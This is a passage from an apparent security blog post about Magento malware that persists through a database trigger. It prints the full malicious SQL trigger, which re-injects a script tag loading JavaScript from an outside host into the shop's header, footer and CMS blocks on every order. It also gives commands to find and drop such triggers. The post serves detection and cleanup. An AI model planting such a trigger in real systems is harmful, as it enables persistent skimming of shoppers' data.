footer HTML definitions in the database. Cleaning these records used to be sufficient to get rid of the malware. But not anymore: this week a new malware pattern surfaced. Once deleted, it uses a clever database trigger to restore itself.
The pattern was discovered by Jeroen Boersma (excellent detective job!). He found the following database trigger (edited for readability):
TRIGGER `after_insert_order` AFTER INSERT ON `sales_flat_order` FOR EACH ROW BEGIN UPDATE core_config_data SET value = IF( value LIKE '%<script src="https://mage-storage.pw/cdn/flexible-min.js"></script>%', value, CONCAT(value, ' <script src="https://mage-storage.pw/cdn/flexible-min.js"></script>') ) WHERE path='design/head/includes' OR path='design/footer/absolute_footer' OR path='design/footer/copyright';\ UPDATE cms_block SET content= IF( content LIKE '%<script src="https://mage-storage.pw/cdn/flexible-min.js"></script>%', content, CONCAT(content, ' <script src="https://mage-storage.pw/cdn/flexible-min.js"></script>') ); END;
The trigger is executed every time a new order is made. The query checks for the existence of the malware in the header, footer, copyright and every CMS block. If absent, it will re-add itself.
This discovery shows we have entered a new phase of malware evolution. Just scanning files is not enough anymore, malware detection methods should now include database analysis.
Check your own database
Do you have persistent malware hidden in your database?
echo 'SHOW TRIGGERS' | n98-magerun db:console
NB. Magento Enterprise and some community extensions contain legitimate triggers. So if you find triggers, look for suspicious SQL code, such as anything containing
< (html tags).
If you find a malicious trigger, you can delete it like this:
echo "DROP TRIGGER <trigger_name>" | n98-magerun db:console
For future reference: the entry vector for this malware was a brute force attack on
/rss/catalog/notifystock/ for an otherwise completely patched shop.